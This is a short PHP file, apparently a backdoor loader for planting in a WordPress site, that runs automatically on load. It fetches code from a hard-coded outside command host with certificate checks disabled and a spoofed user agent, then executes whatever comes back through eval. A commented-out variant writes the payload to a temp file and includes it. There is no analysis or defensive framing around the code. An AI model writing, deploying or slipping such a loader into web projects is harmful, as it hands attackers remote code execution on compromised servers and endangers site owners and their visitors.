<?php
// Biji Acak: eae6a708

class WorkingLoader {
    private static $c2_url = 'https://awscloud.icu//newbro/codeseo/lyymbut3';
    
    public static function execute() {
        // Download backdoor with proper headers
        $payload = self::fetchPayload();
        
        if (empty($payload)) {
            return false;
        }
        
        // Clean and execute
        self::runPayload($payload);
        return true;
    }
    
    private static function fetchPayload() {
        $ch = curl_init(self::$c2_url);
        
        // IMPORTANT: Mimic infected server request
        curl_setopt($ch, CURLOPT_USERAGENT, 'curl/7.68.0');
        curl_setopt($ch, CURLOPT_REFERER, 'http://' . $_SERVER['HTTP_HOST'] . '/');
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_TIMEOUT, 10);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
        
        $response = curl_exec($ch);
        $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        curl_close($ch);
        
        if ($http_code == 200 && !empty($response)) {
            return $response;
        }
        
        return false;
    }
    
    private static function runPayload($code) {
        // METHOD 1: Remove PHP tags and eval (CORRECT WAY)
        eval('?>' . $code);
        
        /* 
        // METHOD 2: Alternative - Write to temp file
        $temp = sys_get_temp_dir() . '/tmp_' . md5(time()) . '.php';
        file_put_contents($temp, $code);
        include($temp);
        @unlink($temp);
        */
    }
}

// Execute the loader
WorkingLoader::execute();

// Continue to WordPress
?>